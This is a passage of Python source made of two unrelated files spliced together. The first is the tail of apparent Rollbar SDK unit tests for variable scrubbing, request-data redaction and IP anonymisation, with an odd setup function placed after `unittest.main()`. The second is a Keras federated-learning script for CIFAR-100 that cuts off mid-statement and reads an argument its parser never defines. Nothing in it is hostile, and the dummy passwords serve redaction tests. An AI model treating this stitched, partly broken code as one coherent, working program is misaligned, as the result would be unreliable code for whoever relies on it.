payload['data']['body']['trace']['frames'][-1]['locals']['not_a_number']) @mock.patch('rollbar.send_payload') def test_scrub_self_referencing(self, send_payload): def _raise(obj): raise Exception() try: obj = {'x': 42.3} obj['child'] = { 'parent': obj } # NOTE(cory): We copy the dict here so that we don't produce a circular reference # from the _rase() args. 
_raise(dict(obj)) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertTrue( (isinstance(payload['data']['body']['trace']['frames'][-1]['locals']['obj'], dict) and 'child' in payload['data']['body']['trace']['frames'][-1]['locals']['obj']) or (isinstance(payload['data']['body']['trace']['frames'][-1]['locals']['obj'], string_types) and payload['data']['body']['trace']['frames'][-1]['locals']['obj'].startswith('<CircularReference')) ) self.assertTrue( (isinstance(payload['data']['body']['trace']['frames'][-1]['locals']['obj'], dict) and 'x' in payload['data']['body']['trace']['frames'][-1]['locals']['obj'] and payload['data']['body']['trace']['frames'][-1]['locals']['obj']['x'] == 42.3) or (isinstance(payload['data']['body']['trace']['frames'][-1]['locals']['obj'], string_types) and payload['data']['body']['trace']['frames'][-1]['locals']['obj'].startswith('<CircularReference')) ) @mock.patch('rollbar.send_payload') def test_scrub_local_ref(self, send_payload): """ NOTE(cory): This test checks to make sure that we do not scrub a local variable that is a reference to a parameter that is scrubbed. Ideally we would be able to scrub 'copy' as well since we know that it has the same value as a field that was scrubbed. """ def _raise(password='sensitive'): copy = password raise Exception() try: _raise() except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual('sensitive', payload['data']['body']['trace']['frames'][-1]['locals']['copy']) @mock.patch('rollbar.send_payload') def test_large_arg_val(self, send_payload): def _raise(large): raise Exception() try: large = ''.join(['#'] * 200) _raise(large) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('large', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual("'###############################################...################################################'", payload['data']['body']['trace']['frames'][-1]['locals']['large']) @mock.patch('rollbar.send_payload') def test_long_list_arg_val(self, send_payload): def _raise(large): raise Exception() try: xlarge = ['hi' for _ in range(30)] # NOTE(cory): We copy the list here so that the local variables from # this frame are not referenced directly by the frame from _raise() # call above. If we didn't copy this list, Rollbar would report a # circular reference for the args on _raise(). 
_raise([str(x) for x in xlarge]) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('large', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertTrue( ("['hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', ...]" == payload['data']['body']['trace']['frames'][-1]['argspec'][0]) or ("['hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', ...]" == payload['data']['body']['trace']['frames'][0]['locals']['xlarge'])) @mock.patch('rollbar.send_payload') def test_last_frame_has_locals(self, send_payload): def _raise(): some_var = 'some value' raise Exception() try: _raise() except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('locals', payload['data']['body']['trace']['frames'][-1]) self.assertIn('some_var', payload['data']['body']['trace']['frames'][-1]['locals']) self.assertEqual("some value", payload['data']['body']['trace']['frames'][-1]['locals']['some_var']) @mock.patch('rollbar.send_payload') def test_all_project_frames_have_locals(self, send_payload): prev_root = rollbar.SETTINGS['root'] rollbar.SETTINGS['root'] = __file__.rstrip('pyc') try: step1() except: rollbar.report_exc_info() finally: rollbar.SETTINGS['root'] = prev_root self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] for frame in payload['data']['body']['trace']['frames']: self.assertIn('locals', frame) @mock.patch('rollbar.send_payload') def test_only_last_frame_has_locals(self, send_payload): prev_root = rollbar.SETTINGS['root'] rollbar.SETTINGS['root'] = 'dummy' try: step1() except: rollbar.report_exc_info() finally: rollbar.SETTINGS['root'] = prev_root self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] num_frames = len(payload['data']['body']['trace']['frames']) for i, frame in enumerate(payload['data']['body']['trace']['frames']): if i < num_frames - 1: self.assertNotIn('locals', frame) else: self.assertIn('locals', frame) @mock.patch('rollbar.send_payload') def test_modify_arg(self, send_payload): # Record locals for all frames prev_root = rollbar.SETTINGS['root'] rollbar.SETTINGS['root'] = __file__.rstrip('pyc') try: called_with('original value') except: rollbar.report_exc_info() finally: rollbar.SETTINGS['root'] = prev_root self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] frames = payload['data']['body']['trace']['frames'] called_with_frame = frames[1] self.assertEqual('arg1', called_with_frame['argspec'][0]) self.assertEqual('changed', called_with_frame['locals']['arg1']) @mock.patch('rollbar.send_payload') def test_unicode_exc_info(self, send_payload): message = '\u221a' try: raise Exception(message) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['data']['body']['trace']['exception']['message'], 
message) @mock.patch('rollbar.lib.transport.post', side_effect=lambda *args, **kw: MockResponse({'status': 'OK'}, 200)) def test_serialize_and_send_payload(self, post=None): invalid_b64 = b'CuX2JKuXuLVtJ6l1s7DeeQ==' invalid = base64.b64decode(invalid_b64) def _raise(): # Make sure that the _invalid local variable makes its # way into the payload even if its value cannot be serialized # properly. _invalid = invalid # Make sure the Password field gets scrubbed even though its # original value could not be serialized properly. Password = invalid password = 'sensitive' raise Exception('bug bug') try: _raise() except: rollbar.report_exc_info() self.assertEqual(post.called, True) payload_data = post.call_args[1]['data'] self.assertIsInstance(payload_data, str) self.assertIn('bug bug', payload_data) try: post.call_args[1]['data'] except: self.assertTrue(False) def test_scrub_webob_request_data(self): rollbar._initialized = False rollbar.init(_test_access_token, locals={'enabled': True}, dummy_key='asdf', handler='blocking', timeout=12345, scrub_fields=rollbar.SETTINGS['scrub_fields'] + ['token', 'secret', 'cookies', 'authorization']) import webob request = webob.Request.blank('/the/path?q=hello&password=hunter2', base_url='http://example.com', headers={ 'X-Real-Ip': '5.6.7.8', 'Cookies': 'name=value; password=hash;', 'Authorization': 'I am from NSA' }, POST='foo=bar&confirm_password=hunter3&token=secret') unscrubbed = rollbar._build_webob_request_data(request) self.assertEqual(unscrubbed['url'], 'http://example.com/the/path?q=hello&password=hunter2') self.assertEqual(unscrubbed['user_ip'], '5.6.7.8') self.assertDictEqual(unscrubbed['GET'], {'q': 'hello', 'password': 'hunter2'}) self.assertDictEqual(unscrubbed['POST'], {'foo': 'bar', 'confirm_password': 'hunter3', 'token': 'secret'}) self.assertEqual('5.6.7.8', unscrubbed['headers']['X-Real-Ip']) self.assertEqual('name=value; password=hash;', unscrubbed['headers']['Cookies']) self.assertEqual('I am from NSA', unscrubbed['headers']['Authorization']) scrubbed = rollbar._transform(unscrubbed) self.assertRegex(scrubbed['url'], r'http://example.com/the/path\?(q=hello&password=-+)|(password=-+&q=hello)') self.assertEqual(scrubbed['GET']['q'], 'hello') self.assertRegex(scrubbed['GET']['password'], r'\*+') self.assertEqual(scrubbed['POST']['foo'], 'bar') self.assertRegex(scrubbed['POST']['confirm_password'], r'\*+') self.assertRegex(scrubbed['POST']['token'], r'\*+') self.assertEqual('5.6.7.8', scrubbed['headers']['X-Real-Ip']) self.assertRegex(scrubbed['headers']['Cookies'], r'\*+') self.assertRegex(scrubbed['headers']['Authorization'], r'\*+') def test_filter_ip_no_user_ip(self): request_data = {'something': 'but no ip'} rollbar._filter_ip(request_data, False) self.assertNotIn('user_ip', request_data) def test_filter_ip_capture_true(self): ip = '123.32.394.99' request_data = {'user_ip': ip} rollbar._filter_ip(request_data, True) self.assertEqual(ip, request_data['user_ip']) def test_filter_ip_anonymize(self): ip = '123.32.394.99' request_data = {'user_ip': ip} rollbar._filter_ip(request_data, rollbar.ANONYMIZE) self.assertNotEqual(ip, request_data['user_ip']) self.assertNotEqual(None, request_data['user_ip']) def test_filter_ip_capture_false(self): ip = '123.32.394.99' request_data = {'user_ip': ip} rollbar._filter_ip(request_data, False) self.assertNotEqual(ip, request_data['user_ip']) self.assertEqual(None, request_data['user_ip']) def test_filter_ip_ipv6_capture_false(self): ip = '2607:f0d0:1002:51::4' request_data = {'user_ip': ip} 
        rollbar._filter_ip(request_data, False)
        self.assertNotEqual(ip, request_data['user_ip'])
        self.assertEqual(None, request_data['user_ip'])

    def test_filter_ip_anonymize_ipv6(self):
        ips = [
            'FE80:0000:0000:0000:0202:B3FF:FE1E:8329',
            'FE80::0202:B3FF:FE1E:8329',
            '2607:f0d0:1002:51::4',
        ]
        for ip in ips:
            request_data = {'user_ip': ip}
            rollbar._filter_ip(request_data, rollbar.ANONYMIZE)
            self.assertNotEqual(ip, request_data['user_ip'])
            self.assertNotEqual(None, request_data['user_ip'])

    def test_starlette_extract_user_ip_from_client_host(self):
        try:
            from starlette.requests import Request
        except ImportError:
            self.skipTest('Requires Starlette package')

        client_host = ('127.0.0.1', 1453)
        ip_forwarded_for = b'192.168.10.10'
        ip_real_ip = b'1.2.3.4'
        scope = {
            'type': 'http',
            'client': client_host,
            'headers': [
                (b'x-forwarded-for', ip_forwarded_for),
                (b'x-real-ip', ip_real_ip),
            ],
        }
        request = Request(scope)

        user_ip = rollbar._starlette_extract_user_ip(request)

        self.assertEqual(user_ip, client_host[0])

    def test_starlette_extract_user_ip_from_headers(self):
        try:
            from starlette.requests import Request
        except ImportError:
            self.skipTest('Requires Starlette package')

        ip_forwarded_for = b'192.168.10.10'
        ip_real_ip = b'1.2.3.4'

        # Headers contain only X-Forwarded-For
        scope = {'type': 'http', 'headers': [(b'x-forwarded-for', ip_forwarded_for)]}
        request = Request(scope)
        user_ip = rollbar._starlette_extract_user_ip(request)
        self.assertEqual(user_ip, ip_forwarded_for.decode())

        # Headers contain only X-Real-Ip
        scope = {'type': 'http', 'headers': [(b'x-real-ip', ip_real_ip)]}
        request = Request(scope)
        user_ip = rollbar._starlette_extract_user_ip(request)
        self.assertEqual(user_ip, ip_real_ip.decode())

        # Headers contain both X-Forwarded-For and X-Real-Ip
        scope = {
            'type': 'http',
            'headers': [
                (b'x-forwarded-for', ip_forwarded_for),
                (b'x-real-ip', ip_real_ip),
            ],
        }
        request = Request(scope)
        user_ip = rollbar._starlette_extract_user_ip(request)
        self.assertEqual(user_ip, ip_forwarded_for.decode())


### Helpers

def step1():
    val1 = 1
    step2()


def step2():
    val2 = 2
    raise Exception()


def called_with(arg1):
    arg1 = 'changed'
    step1()


class CauseException(Exception):
    pass


class MockResponse:
    def __init__(self, json_data, status_code):
        self.json_data = json_data
        self.status_code = status_code

    @property
    def content(self):
        return json.dumps(self.json_data)

    def json(self):
        return self.json_data


class MockRawResponse:
    def __init__(self, data, status_code):
        self.data = data
        self.status_code = status_code

    @property
    def content(self):
        return self.data

    def json(self):
        return self.data


class MockLambdaContext(object):
    def __init__(self, x):
        self.function_name = 1
        self.function_version = 2
        self.invoked_function_arn = 3
        self.aws_request_id = 4
        self.x = x

    def get_remaining_time_in_millis(self):
        return 42


def fastapi_add_route_with_request_param(app, endpoint, path, request_param):
    from fastapi import Request

    endpoint.__annotations__[request_param] = Request
    return app.get(path)(endpoint)


if __name__ == '__main__':
    unittest.main()
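# A minimal usage sketch of the configuration these tests exercise. The access token is
# a placeholder and the `scrub_fields` list here is illustrative; `locals={'enabled': True}`
# mirrors the settings used in test_scrub_webob_request_data above.
def _example_rollbar_setup():
    rollbar.init(
        'ACCESS_TOKEN_PLACEHOLDER',
        locals={'enabled': True},             # capture local variables into trace frames
        scrub_fields=['password', 'secret'],  # matching values are replaced with '*'s
    )
    try:
        raise Exception('example')
    except Exception:
        rollbar.report_exc_info()             # frames carry argspec/varargspec/keywordspec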
federated_learning_keras_PS_threads_CIFAR100.py
from DataSets import CIFARData
from DataSets_task import CIFARData_task
from consensus.consensus_v2 import CFA_process
from consensus.parameter_server import Parameter_Server  # best use with PS active
# from ReplayMemory import ReplayMemory
import numpy as np
import os
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras import models
import argparse
import warnings
import glob
import datetime
import scipy.io as sio
# import multiprocessing
import threading
import math
from matplotlib.pyplot import pause
import time

warnings.filterwarnings("ignore")

parser = argparse.ArgumentParser()
parser.add_argument('-resume', default=0, help="set 1 to resume from a previous simulation, 0 to start from the beginning", type=float)
parser.add_argument('-PS', default=1, help="set 1 to enable PS server and FedAvg, set 0 to disable PS", type=float)
parser.add_argument('-consensus', default=0, help="set 1 to enable consensus, set 0 to disable", type=float)
parser.add_argument('-mu', default=0.01, help="sets the learning rate for all setups", type=float)
parser.add_argument('-eps', default=1, help="sets the mixing parameters for model averaging (CFA)", type=float)
parser.add_argument('-target', default=0.5, help="sets the target loss to stop federation", type=float)
parser.add_argument('-K', default=30, help="sets the number of network devices", type=int)
parser.add_argument('-Ka', default=20, help="sets the number of active devices per round in FA (<= K)", type=int)
parser.add_argument('-N', default=1, help="sets the max. number of neighbors per device per round in CFA", type=int)
parser.add_argument('-samp', default=500, help="sets the number of samples per device", type=int)
parser.add_argument('-noniid_assignment', default=1, help="set 0 for iid assignment, 1 for non-iid random", type=int)
parser.add_argument('-run', default=0, help="sets the run id", type=int)
parser.add_argument('-random_data_distribution', default=0, help="set 0 for fixed distribution, 1 for time-varying", type=int)
parser.add_argument('-batches', default=5, help="sets the number of batches per learning round", type=int)
parser.add_argument('-batch_size', default=100, help="sets the batch size per learning round", type=int)
parser.add_argument('-graph', default=6, help="sets the input graph: 0 for default graph, >0 uses the input graph in vGraph.mat, and choose one graph from the available adjacency matrices", type=int)
parser.add_argument('-modelselection', default=0, help="sets the model: 0 for vgg-1", type=int)
args = parser.parse_args()

devices = args.K  # NUMBER OF DEVICES
active_devices_per_round = args.Ka
n_outputs = 100  # CIFAR-100 has 100 output classes
max_epochs = 1000
validation_train = 50000  # VALIDATION and training DATASET size
validation_test = 10000
condition = args.modelselection

# set an arbitrary optimizer, here Adam is used
optimizer = keras.optimizers.Adam(learning_rate=args.mu, clipnorm=1.0)
# optimizer = keras.optimizers.SGD(learning_rate=args.mu, momentum=0.9)

if args.consensus == 1:
    federated = True
    parameter_server = False
elif args.PS == 1:
    federated = False
    parameter_server = True
else:  # CL: CENTRALIZED LEARNING ON DEVICE 0 (DATA CENTER)
    federated = False
    parameter_server = False

if active_devices_per_round > devices:
    active_devices_per_round = devices

target_loss = args.target

# Configuration parameters for the whole setup
seed = 42
# batch_size = 5  # Size of batch taken from replay buffer
batch_size = args.batch_size
number_of_batches = args.batches
training_set_per_device = args.samp # NUMBER OF TRAINING SAMPLES PER DEVICE if (training_set_per_device > validation_train/args.K): training_set_per_device = math.floor(validation_train/args.K) print(training_set_per_device) if batch_size > training_set_per_device: batch_size = training_set_per_device # if batch_size*number_of_batches > training_set_per_device: # number_of_batches = math.floor(training_set_per_device/batch_size) # number_of_batches = int(training_set_per_device/batch_size) # number_of_batches = args.batches number_of_batches_for_validation = int(validation_test/batch_size) print("Number of batches for learning {}".format(number_of_batches)) max_lag = number_of_batches*2 # consensus max delay 2= 2 epochs max refresh_server = 1 # refresh server updates (in sec) validation_start = 1 # start validation in epochs # Using huber loss for stability loss_function = keras.losses.Huber() # tf.keras.regularizers.l2(l2=0.01, **kwargs) # def get_noniid_data(total_training_size, devices, batch_size): # samples = np.random.random_integers(batch_size, total_training_size - batch_size * (devices - 1), # devices) # create random numbers # samples = samples / np.sum(samples, axis=0) * total_training_size # force them to sum to totals # # Ignore the following if you don't need integers # samples = np.round(samples) # transform them into integers # remainings = total_training_size - np.sum(samples, axis=0) # check if there are corrections to be done # step = 1 if remainings > 0 else -1 # while remainings != 0: # i = np.random.randint(devices) # if samples[i] + step >= 0: # samples[i] += step # remainings -= step # return samples #### def preprocess_observation(obs, batch_size): img = obs# crop and downsize img = (img).astype(np.float) return img.reshape(batch_size, 32, 32, 3) def create_q_model(): # Network defined by the Deepmind paper inputs = layers.Input(shape=(32, 32, 3,)) if condition == 0: # VGG 1 BLOCK layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(inputs) layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(layer1) layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2) layer4 = layers.Flatten()(layer3) layer5 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer4) classification = layers.Dense(n_outputs, activation="linear")(layer5) elif condition == 1: # VGG 2 BLOCK layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( inputs) layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer1) layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2) layer4 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer3) layer5 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer4) layer6 = layers.MaxPooling2D(pool_size=(2, 2))(layer5) layer7 = layers.Flatten()(layer6) layer8 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer7) classification = layers.Dense(n_outputs, 
activation="linear")(layer8) else: # VGG 3 BLOCK layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( inputs) layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer1) layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2) layer4 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer3) layer5 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer4) layer6 = layers.MaxPooling2D(pool_size=(2, 2))(layer5) layer7 = layers.Conv2D(128, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer6) layer8 = layers.Conv2D(128, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer7) layer9 = layers.MaxPooling2D(pool_size=(2, 2))(layer8) layer10 = layers.Flatten()(layer9) layer11 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer10) classification = layers.Dense(n_outputs, activation="linear")(layer11) # Convolutions # layer1 = layers.Conv2D(32, 8, strides=4, activation="relu")(inputs) # layer2 = layers.Conv2D(64, 4, strides=2, activation="relu")(layer1) # layer3 = layers.Conv2D(64, 3, strides=1, activation="relu")(layer2) # # layer4 = layers.Flatten()(layer3) # # layer5 = layers.Dense(512, activation="relu")(layer4) # classification = layers.Dense(n_outputs, activation="linear")(layer5) return keras.Model(inputs=inputs, outputs=classification) def processParameterServer(devices, active_devices_per_round, federated, refresh_server=1): model_global = create_q_model() model_parameters_initial = np.asarray(model_global.get_weights()) parameter_server = Parameter_Server(devices, model_parameters_initial, active_devices_per_round) global_target_model = 'results/model_global.npy' np.save(global_target_model, model_parameters_initial) pause(5) # wait for neighbors while True: pause(refresh_server) # refresh global model on every xx seconds np.save(global_target_model, parameter_server.federated_target_weights_aggregation(epoch=0, aggregation_type=0)) fileList = glob.glob('*.mat', recursive=False) if len(fileList) == devices: # stop the server break # execute for each deployed device def processData(device_index, start_samples, samples, federated, full_data_size, number_of_batches, parameter_server, sample_distribution): pause(5) # PS server (if any) starts first checkpointpath1 = 'results/model{}.h5'.format(device_index) outfile = 'results/dump_train_variables{}.npz'.format(device_index) outfile_models = 'results/dump_train_model{}.npy'.format(device_index) global_model = 'results/model_global.npy' np.random.seed(1) tf.random.set_seed(1) # common initialization learning_rate = args.mu learning_rate_local = learning_rate B = np.ones((devices, devices)) - tf.one_hot(np.arange(devices), devices) Probabilities = B[device_index, :]/(devices - 1) training_signal = False # check for backup variables on start if os.path.isfile(checkpointpath1): train_start = False # backup the model and the model target model = models.load_model(checkpointpath1) data_history = [] 
label_history = [] local_model_parameters = np.load(outfile_models, allow_pickle=True) model.set_weights(local_model_parameters.tolist()) dump_vars = np.load(outfile, allow_pickle=True) frame_count = dump_vars['frame_count'] epoch_loss_history = dump_vars['epoch_loss_history'].tolist() running_loss = np.mean(epoch_loss_history[-5:]) epoch_count = dump_vars['epoch_count'] else: train_start = True model = create_q_model() data_history = [] label_history = [] frame_count = 0 # Experience replay buffers epoch_loss_history = [] epoch_count = 0 running_loss = math.inf training_end = False # create a data object (here radar data) if args.noniid_assignment == 0: data_handle = CIFARData(device_index, start_samples, samples, full_data_size, args.random_data_distribution) else: data_handle = CIFARData_task(device_index, start_samples, samples, full_data_size, args.random_data_distribution) # create a consensus object cfa_consensus = CFA_process(devices, device_index, args.N) while True: # Run until solved # collect 1 batch frame_count += 1 obs, labels = data_handle.getTrainingData(batch_size) data_batch = preprocess_observation(obs, batch_size) # Save data and labels in the current learning session data_history.append(data_batch) label_history.append(labels) # Local learning update every "number of batches" batches if frame_count % number_of_batches == 0 and not training_signal: epoch_count += 1 for i in range(number_of_batches): data_sample = np.array(data_history[i]) label_sample = np.array(label_history[i]) # Create a mask to calculate loss masks = tf.one_hot(label_sample, n_outputs) with tf.GradientTape() as tape: # Train the model on data samples classes = model(data_sample) # Apply the masks class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1) # Calculate loss loss = loss_function(label_sample, class_v) # Backpropagation grads = tape.gradient(loss, model.trainable_variables) optimizer.apply_gradients(zip(grads, model.trainable_variables)) del data_history del label_history data_history = [] label_history = [] model_weights = np.asarray(model.get_weights()) model.save(checkpointpath1, include_optimizer=True, save_format='h5') np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history, training_end=training_end, epoch_count=epoch_count, loss=running_loss) np.save(outfile_models, model_weights) # Consensus round # update local model cfa_consensus.update_local_model(model_weights) # neighbor = cfa_consensus.get_connectivity(device_index, args.N, devices) # fixed neighbor # neighbor = np.random.choice(np.arange(devices), args.N, p=Probabilities, replace=False) # choose neighbor neighbor = np.random.choice(np.arange(devices), args.N, replace=False) # choose neighbor while neighbor == device_index: neighbor = np.random.choice(np.arange(devices), args.N, replace=False) if not train_start: if federated and not training_signal: eps_c = 1 / (args.N + 1) # apply consensus for model parameter print("Consensus from neighbor {} for device {}, local loss {:.2f}".format(neighbor, device_index, loss.numpy())) model.set_weights(cfa_consensus.federated_weights_computing(neighbor, args.N, frame_count, eps_c, max_lag)) if cfa_consensus.getTrainingStatusFromNeightbor(): # a neighbor completed the training, with loss < target, transfer learning is thus applied (the device will copy and reuse the same model) training_signal = True # stop local learning, just do validation else: print("Warm up") train_start = False # check if parameter server is enabled stop_aggregation = False if 
parameter_server: pause(refresh_server) while not os.path.isfile(global_model): # implementing consensus print("waiting") pause(1) try: model_global = np.load(global_model, allow_pickle=True) except: pause(5) print("retrying opening global model") try: model_global = np.load(global_model, allow_pickle=True) except: print("halting aggregation") stop_aggregation = True if not stop_aggregation: # print("updating from global model inside the parmeter server") for k in range(cfa_consensus.layers): # model_weights[k] = model_weights[k]+ 0.5*(model_global[k]-model_weights[k]) model_weights[k] = model_global[k] model.set_weights(model_weights.tolist()) del model_weights # validation tool for device 'device_index' if epoch_count > validation_start and frame_count % number_of_batches == 0: avg_cost = 0. for i in range(number_of_batches_for_validation): obs_valid, labels_valid = data_handle.getTestData(batch_size, i) # obs_valid, labels_valid = data_handle.getRandomTestData(batch_size) data_valid = preprocess_observation(np.squeeze(obs_valid), batch_size) data_sample = np.array(data_valid) label_sample = np.array(labels_valid) # Create a mask to calculate loss masks = tf.one_hot(label_sample, n_outputs) classes = model(data_sample) # Apply the masks class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1) # Calculate loss loss = loss_function(label_sample, class_v) avg_cost += loss / number_of_batches_for_validation # Training loss epoch_loss_history.append(avg_cost) print("Device {} epoch count {}, validation loss {:.2f}".format(device_index, epoch_count, avg_cost)) # mean loss for last 5 epochs running_loss = np.mean(epoch_loss_history[-5:]) if running_loss < target_loss or training_signal: # Condition to consider the task solved print("Solved for device {} at epoch {} with average loss {:.2f} !".format(device_index, epoch_count, running_loss)) training_end = True model_weights = np.asarray(model.get_weights()) model.save(checkpointpath1, include_optimizer=True, save_format='h5') # model_target.save(checkpointpath2, include_optimizer=True, save_format='h5') np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history, training_end=training_end, epoch_count=epoch_count, loss=running_loss) np.save(outfile_models, model_weights) if federated: dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated, "parameter_server": parameter_server, "devices": devices, "neighbors": args.N, "active_devices": args.Ka_consensus, "batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution} elif parameter_server: dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated, "parameter_server": parameter_server, "devices": devices, "active_devices": active_devices_per_round, "batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution} else: dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated, "parameter_server": parameter_server, "devices": devices, "batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution} if federated: sio.savemat( "results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format( device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, 
batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1) sio.savemat( "CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format( device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1) elif parameter_server: sio.savemat( "results/matlab/FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format( device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1) sio.savemat( "FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format( device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size), dict_1) else: # CL sio.savemat( "results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format( samples, devices, number_of_batches, batch_size,args.noniid_assignment, args.run, args.random_data_distribution), dict_1) break if epoch_count > max_epochs: # stop simulation print("Unsolved for device {} at epoch {}!".format(device_index, epoch_count)) training_end = True model_weights = np.asarray(model.get_weights()) model.save(checkpointpath1, include_optimizer=True, save_format='h5') # model_target.save(checkpointpath2, include_optimizer=True, save_format='h5') np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history, training_end=training_end, epoch_count=epoch_count, loss=running_loss) np.save(outfile_models, model_weights) if federated: dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated, "parameter_server": parameter_server, "devices": devices, "neighbors": args.N, "active_devices": args.Ka_consensus, "batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution} elif parameter_server: dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated, "parameter_server": parameter_server, "devices": devices, "active_devices": active_devices_per_round, "batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution} else: dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated, "parameter_server": parameter_server, "devices": devices, "batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution} if federated: sio.savemat( "results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format( device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1) sio.savemat( "CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format( device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1) elif parameter_server: sio.savemat( "results/matlab/FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format( device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1) sio.savemat( 